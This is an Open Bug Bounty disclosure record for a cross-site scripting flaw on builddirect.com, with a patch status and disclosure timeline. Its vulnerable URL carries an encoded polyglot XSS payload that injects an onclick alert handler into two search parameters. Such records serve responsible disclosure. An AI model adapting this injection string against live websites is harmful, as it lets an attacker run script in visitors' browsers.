builddirect.com XSS vulnerability

2016-04-06T07:39:00
ID OBB:144968
Type openbugbounty
Reporter Spam404
Modified 2017-04-10T10:30:00

Description

Vulnerable URL:
https://www.builddirect.com/Result.aspx?N=0&Ntk=Secondary&Ntt=%2F*-%2F*%60%2F*\%60%2F*%27%2F*%22%2F**%2F%28%2F*%20*%2FoNcliCk%3Dalert%28%2FXSSPOSED%2F%29%20%29%2F%2F%250D%250A%250D%250A%2F%2F&Nty=1&D=%2F*-%2F*%60%2F*\%60%2F*%27%2F*%22%2F**%2F%28%2F*%20*%2FoNcliCk%3Dalert%28%2FXSSPOSED%2F%29%20%29%2F%2F%250D%250A%250D%250A%2F%2F&Ntx=mode+matchallpartial&Dx=mode+matchallpartial

Details:

Description| Value
---|---
Patched:| Yes, at 09.04.2017
Latest check for patch:| 09.04.2017 17:16 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 17279
Google Pagerank| 4
VIP website status:| Yes
Check builddirect.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 April, 2016 07:39 GMT
Generic security notifications sent to website owner| 6 April, 2016 07:41 GMT
Notification sent to subscribers (without technical details)| 6 April, 2016 10:17 GMT
Vulnerability details disclosed by researcher| 29 June, 2016 08:11 GMT
Vulnerability patched by the website owner| 10 April, 2017 10:30 GMT